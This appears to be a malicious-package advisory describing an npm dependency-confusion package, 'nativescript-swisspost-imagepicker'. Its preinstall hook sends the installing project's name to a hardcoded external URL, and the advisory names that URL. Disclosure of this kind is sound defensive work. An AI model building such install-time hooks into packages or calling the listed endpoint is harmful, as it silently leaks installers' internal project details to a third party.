MAL-2026-5792

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62) package.json declares `preinstall: node index.js`. On `npm install`, index.js reads `process.env.INIT_CWD` (the installing project's working directory), takes its basename, and POSTs a JSON payload `{pkg, timestamp, transport, project}` to the hardcoded URL `https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5`. The package name `nativescript-swisspost-imagepicker`, the package description (`Security PoC for Bug Bounty`), and the comment `Harmless dependency confusion PoC` in index.js identify this as a dependency-confusion squat targeting an internal Swiss Post NativeScript namespace. On install, the installer's internal project name is silently leaked to a third-party endpoint, confirming the existence and naming of private packages and giving the operator of `deepbounty.dd06-dev.fr` a directory of organizations whose builds resolved this public package. Author self-labelling it as a bug-bounty PoC does not change the installer-side impact: unsolicited install-time outbound network carrying installer-side identifiers to an attacker-controlled host.